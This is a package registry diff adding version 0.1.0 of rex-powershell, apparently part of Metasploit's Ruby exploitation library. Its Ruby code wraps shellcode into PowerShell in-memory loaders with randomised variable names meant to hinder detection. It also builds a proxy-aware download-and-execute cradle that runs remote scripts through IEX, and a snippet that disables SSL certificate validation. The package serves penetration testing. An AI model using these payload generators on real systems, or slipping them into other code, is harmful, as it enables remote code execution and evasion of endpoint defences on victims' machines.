rex-powershell 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,78 @@
1
+ # -*- coding: binary -*-
2
+ require 'rex/random_identifier'
3
+
4
+ module Rex
5
+ module Powershell
6
+ module Payload
7
+
8
+ def self.read_replace_script_template(template_path, filename, hash_sub)
9
+ template_pathname = File.join(template_path, filename)
10
+ template = ''
11
+ File.open(template_pathname, "rb") {|f| template = f.read}
12
+ template % hash_sub
13
+ end
14
+
15
+ def self.to_win32pe_psh_net(template_path, code)
16
+ rig = Rex::RandomIdentifier::Generator.new()
17
+ rig.init_var(:var_code)
18
+ rig.init_var(:var_kernel32)
19
+ rig.init_var(:var_baseaddr)
20
+ rig.init_var(:var_threadHandle)
21
+ rig.init_var(:var_output)
22
+ rig.init_var(:var_codeProvider)
23
+ rig.init_var(:var_compileParams)
24
+ rig.init_var(:var_syscode)
25
+ rig.init_var(:var_temp)
26
+
27
+ hash_sub = rig.to_h
28
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
29
+
30
+ read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
31
+ end
32
+
33
+ def self.to_win32pe_psh(template_path, code)
34
+ hash_sub = {}
35
+ hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
36
+ hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
37
+ hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
38
+ hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
39
+ hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
40
+ hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
41
+ hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
42
+
43
+ hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
44
+
45
+ read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
46
+ end
47
+
48
+ #
49
+ # Reflection technique prevents the temporary .cs file being created for the .NET compiler
50
+ # Tweaked by shellster
51
+ # Originally from PowerSploit
52
+ #
53
+ def self.to_win32pe_psh_reflection(template_path, code)
54
+ # Intialize rig and value names
55
+ rig = Rex::RandomIdentifier::Generator.new()
56
+ rig.init_var(:func_get_proc_address)
57
+ rig.init_var(:func_get_delegate_type)
58
+ rig.init_var(:var_code)
59
+ rig.init_var(:var_module)
60
+ rig.init_var(:var_procedure)
61
+ rig.init_var(:var_unsafe_native_methods)
62
+ rig.init_var(:var_parameters)
63
+ rig.init_var(:var_return_type)
64
+ rig.init_var(:var_type_builder)
65
+ rig.init_var(:var_buffer)
66
+ rig.init_var(:var_hthread)
67
+
68
+ hash_sub = rig.to_h
69
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
70
+
71
+ read_replace_script_template(template_path,
72
+ "to_mem_pshreflection.ps1.template",
73
+ hash_sub).gsub(/(?<!\r)\n/, "\r\n")
74
+ end
75
+
76
+ end
77
+ end
78
+ end
@@ -0,0 +1,93 @@
1
+ # -*- coding: binary -*-
2
+
3
+ module Rex
4
+ module Powershell
5
+ ##
6
+ # Convenience methods for generating powershell code in Ruby
7
+ ##
8
+
9
+ module PshMethods
10
+ #
11
+ # Download file via .NET WebClient
12
+ #
13
+ # @param src [String] URL to the file
14
+ # @param target [String] Location to save the file
15
+ #
16
+ # @return [String] Powershell code to download a file
17
+ def self.download(src, target)
18
+ target ||= '$pwd\\' << src.split('/').last
19
+ %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
20
+ end
21
+
22
+ #
23
+ # Uninstall app, or anything named like app
24
+ #
25
+ # @param app [String] Name of application
26
+ # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
27
+ # the application name
28
+ #
29
+ # @return [String] Powershell code to uninstall an application
30
+ def self.uninstall(app, fuzzy = true)
31
+ match = fuzzy ? '-like' : '-eq'
32
+ %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
33
+ end
34
+
35
+ #
36
+ # Create secure string from plaintext
37
+ #
38
+ # @param str [String] String to create as a SecureString
39
+ #
40
+ # @return [String] Powershell code to create a SecureString
41
+ def self.secure_string(str)
42
+ %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
43
+ end
44
+
45
+ #
46
+ # Find PID of file lock owner
47
+ #
48
+ # @param filename [String] Filename
49
+ #
50
+ # @return [String] Powershell code to identify the PID of a file
51
+ # lock owner
52
+ def self.who_locked_file(filename)
53
+ %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
54
+ end
55
+
56
+ #
57
+ # Return last time of login
58
+ #
59
+ # @param user [String] Username
60
+ #
61
+ # @return [String] Powershell code to return the last time of a user
62
+ # login
63
+ def self.get_last_login(user)
64
+ %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
65
+ end
66
+
67
+ #
68
+ # Disable SSL Certificate verification
69
+ #
70
+ # @return [String] Powershell code to disable SSL verification
71
+ # checks.
72
+ def self.ignore_ssl_certificate
73
+ '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
74
+ end
75
+
76
+ #
77
+ # Use the default system web proxy and credentials to download a URL
78
+ # as a string and execute the contents as PowerShell
79
+ #
80
+ # @param url [String] string to download
81
+ #
82
+ # @return [String] PowerShell code to download a URL
83
+ def self.proxy_aware_download_and_exec_string(url)
84
+ var = Rex::Text.rand_text_alpha(1)
85
+ cmd = "$#{var}=new-object net.webclient;"
86
+ cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
87
+ cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
88
+ cmd << "IEX $#{var}.downloadstring('#{url}');"
89
+ cmd
90
+ end
91
+ end
92
+ end
93
+ end
@@ -0,0 +1,96 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'forwardable'
4
+
5
+ module Rex
6
+ module Powershell
7
+ class Script
8
+ attr_accessor :code
9
+ attr_reader :functions, :rig
10
+
11
+ include Output
12
+ include Parser
13
+ include Obfu
14
+ # Pretend we are actually a string
15
+ extend ::Forwardable
16
+ # In case someone messes with String we delegate based on its instance methods
17
+ # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
18
+ def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
19
+ :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
20
+ :enum_for, :display, :tr_s!, :freeze, :gsub!, :split, :rindex, :<<, :<=>, :+, :lstrip!,
21
+ :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
22
+ :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
23
+ :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
24
+ :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
25
+ :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
26
+ :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
27
+ :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
28
+ :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
29
+ :initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
30
+ :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
31
+ :end_with?
32
+
33
+ def initialize(code)
34
+ @code = ''
35
+ @rig = Rex::RandomIdentifier::Generator.new
36
+
37
+ begin
38
+ # Open code file for reading
39
+ fd = ::File.new(code || '', 'rb')
40
+ while (line = fd.gets)
41
+ @code << line
42
+ end
43
+
44
+ # Close open file
45
+ fd.close
46
+ rescue Errno::ENAMETOOLONG, Errno::ENOENT
47
+ # Treat code as a... code
48
+ @code = code.to_s.dup # in case we're eating another script
49
+ end
50
+ @functions = get_func_names.map { |f| get_func(f) }
51
+ end
52
+
53
+ ##
54
+ # Class methods
55
+ ##
56
+
57
+ #
58
+ # Convert binary to byte array, read from file if able
59
+ #
60
+ # @param input_data [String] Path to powershell file or powershell
61
+ # code string
62
+ # @param var_name [String] Byte array variable name
63
+ #
64
+ # @return [String] input_data as a powershell byte array
65
+ def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
66
+ # File will raise an exception if the path contains null byte
67
+ if input_data.include? "\x00"
68
+ code = input_data
69
+ else
70
+ code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
71
+ end
72
+
73
+ code = code.unpack('C*')
74
+ psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
75
+ lines = []
76
+ 1.upto(code.length - 1) do |byte|
77
+ if (byte % 10 == 0)
78
+ lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
79
+ else
80
+ lines.push ",0x#{code[byte].to_s(16)}"
81
+ end
82
+ end
83
+
84
+ psh << lines.join('') + "\r\n"
85
+ end
86
+
87
+ #
88
+ # Return list of code modifier methods
89
+ #
90
+ # @return [Array] Code modifiers
91
+ def self.code_modifiers
92
+ instance_methods.select { |m| m =~ /^(strip|sub)/ }
93
+ end
94
+ end # class Script
95
+ end
96
+ end
@@ -0,0 +1,5 @@
1
+ module Rex
2
+ module Powershell
3
+ VERSION = "0.1.0"
4
+ end
5
+ end
@@ -0,0 +1,27 @@
1
+ # coding: utf-8
2
+ lib = File.expand_path('../lib', __FILE__)
3
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
4
+ require 'rex/powershell/version'
5
+
6
+ Gem::Specification.new do |spec|
7
+ spec.name = "rex-powershell"
8
+ spec.version = Rex::Powershell::VERSION
9
+ spec.authors = ["David 'thelightcosine' Maloney"]
10
+ spec.email = ["DMaloney@rapid7.com"]
11
+
12
+ spec.summary = %q{Rex Powershell Utilities}
13
+ spec.description = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
14
+ spec.homepage = "https://github.com/rapid7/rex-powershell"
15
+
16
+ spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
17
+ spec.bindir = "exe"
18
+ spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
19
+ spec.require_paths = ["lib"]
20
+
21
+ spec.add_development_dependency "bundler", "~> 1.12"
22
+ spec.add_development_dependency "rake", "~> 10.0"
23
+ spec.add_development_dependency "rspec", "~> 3.0"
24
+
25
+ spec.add_runtime_dependency 'rex-text'
26
+ spec.add_runtime_dependency 'rex-random_identifier'
27
+ end
metadata ADDED
@@ -0,0 +1,213 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: rex-powershell
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - David 'thelightcosine' Maloney
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain:
11
+ - |
12
+ -----BEGIN CERTIFICATE-----
13
+ MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
14
+ A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
15
+ b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
16
+ MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
17
+ YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
18
+ aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
19
+ jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
20
+ xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
21
+ 1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
22
+ snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
23
+ U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
24
+ 9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
25
+ BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
26
+ AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
27
+ yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
28
+ 38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
29
+ AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
30
+ DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
31
+ HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
32
+ -----END CERTIFICATE-----
33
+ - |
34
+ -----BEGIN CERTIFICATE-----
35
+ MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
36
+ A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
37
+ b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
38
+ MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
39
+ YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
40
+ IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
41
+ NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
42
+ o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
43
+ 0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
44
+ jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
45
+ STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
46
+ O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
47
+ Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
48
+ PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
49
+ bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
50
+ bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
51
+ MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
52
+ PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
53
+ kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
54
+ jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
55
+ 88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
56
+ fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
57
+ sGgOJO9K9gslJO8k
58
+ -----END CERTIFICATE-----
59
+ - |
60
+ -----BEGIN CERTIFICATE-----
61
+ MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
62
+ MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
63
+ VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
64
+ NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
65
+ c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
66
+ MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
67
+ CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
68
+ /Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
69
+ tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
70
+ 5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
71
+ edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
72
+ 8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
73
+ AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
74
+ Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
75
+ VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
76
+ bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
77
+ MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
78
+ ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
79
+ bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
80
+ w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
81
+ SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
82
+ YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
83
+ 1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
84
+ mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
85
+ 2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
86
+ QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
87
+ -----END CERTIFICATE-----
88
+ date: 2016-06-21 00:00:00.000000000 Z
89
+ dependencies:
90
+ - !ruby/object:Gem::Dependency
91
+ name: bundler
92
+ requirement: !ruby/object:Gem::Requirement
93
+ requirements:
94
+ - - "~>"
95
+ - !ruby/object:Gem::Version
96
+ version: '1.12'
97
+ type: :development
98
+ prerelease: false
99
+ version_requirements: !ruby/object:Gem::Requirement
100
+ requirements:
101
+ - - "~>"
102
+ - !ruby/object:Gem::Version
103
+ version: '1.12'
104
+ - !ruby/object:Gem::Dependency
105
+ name: rake
106
+ requirement: !ruby/object:Gem::Requirement
107
+ requirements:
108
+ - - "~>"
109
+ - !ruby/object:Gem::Version
110
+ version: '10.0'
111
+ type: :development
112
+ prerelease: false
113
+ version_requirements: !ruby/object:Gem::Requirement
114
+ requirements:
115
+ - - "~>"
116
+ - !ruby/object:Gem::Version
117
+ version: '10.0'
118
+ - !ruby/object:Gem::Dependency
119
+ name: rspec
120
+ requirement: !ruby/object:Gem::Requirement
121
+ requirements:
122
+ - - "~>"
123
+ - !ruby/object:Gem::Version
124
+ version: '3.0'
125
+ type: :development
126
+ prerelease: false
127
+ version_requirements: !ruby/object:Gem::Requirement
128
+ requirements:
129
+ - - "~>"
130
+ - !ruby/object:Gem::Version
131
+ version: '3.0'
132
+ - !ruby/object:Gem::Dependency
133
+ name: rex-text
134
+ requirement: !ruby/object:Gem::Requirement
135
+ requirements:
136
+ - - ">="
137
+ - !ruby/object:Gem::Version
138
+ version: '0'
139
+ type: :runtime
140
+ prerelease: false
141
+ version_requirements: !ruby/object:Gem::Requirement
142
+ requirements:
143
+ - - ">="
144
+ - !ruby/object:Gem::Version
145
+ version: '0'
146
+ - !ruby/object:Gem::Dependency
147
+ name: rex-random_identifier
148
+ requirement: !ruby/object:Gem::Requirement
149
+ requirements:
150
+ - - ">="
151
+ - !ruby/object:Gem::Version
152
+ version: '0'
153
+ type: :runtime
154
+ prerelease: false
155
+ version_requirements: !ruby/object:Gem::Requirement
156
+ requirements:
157
+ - - ">="
158
+ - !ruby/object:Gem::Version
159
+ version: '0'
160
+ description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
161
+ scripts
162
+ email:
163
+ - DMaloney@rapid7.com
164
+ executables: []
165
+ extensions: []
166
+ extra_rdoc_files: []
167
+ files:
168
+ - ".gitignore"
169
+ - ".rspec"
170
+ - ".travis.yml"
171
+ - CODE_OF_CONDUCT.md
172
+ - Gemfile
173
+ - LICENSE
174
+ - README.md
175
+ - Rakefile
176
+ - bin/console
177
+ - bin/setup
178
+ - lib/rex/powershell.rb
179
+ - lib/rex/powershell/command.rb
180
+ - lib/rex/powershell/function.rb
181
+ - lib/rex/powershell/obfu.rb
182
+ - lib/rex/powershell/output.rb
183
+ - lib/rex/powershell/param.rb
184
+ - lib/rex/powershell/parser.rb
185
+ - lib/rex/powershell/payload.rb
186
+ - lib/rex/powershell/psh_methods.rb
187
+ - lib/rex/powershell/script.rb
188
+ - lib/rex/powershell/version.rb
189
+ - rex-powershell.gemspec
190
+ homepage: https://github.com/rapid7/rex-powershell
191
+ licenses: []
192
+ metadata: {}
193
+ post_install_message:
194
+ rdoc_options: []
195
+ require_paths:
196
+ - lib
197
+ required_ruby_version: !ruby/object:Gem::Requirement
198
+ requirements:
199
+ - - ">="
200
+ - !ruby/object:Gem::Version
201
+ version: '0'
202
+ required_rubygems_version: !ruby/object:Gem::Requirement
203
+ requirements:
204
+ - - ">="
205
+ - !ruby/object:Gem::Version
206
+ version: '0'
207
+ requirements: []
208
+ rubyforge_project:
209
+ rubygems_version: 2.4.8
210
+ signing_key:
211
+ specification_version: 4
212
+ summary: Rex Powershell Utilities
213
+ test_files: []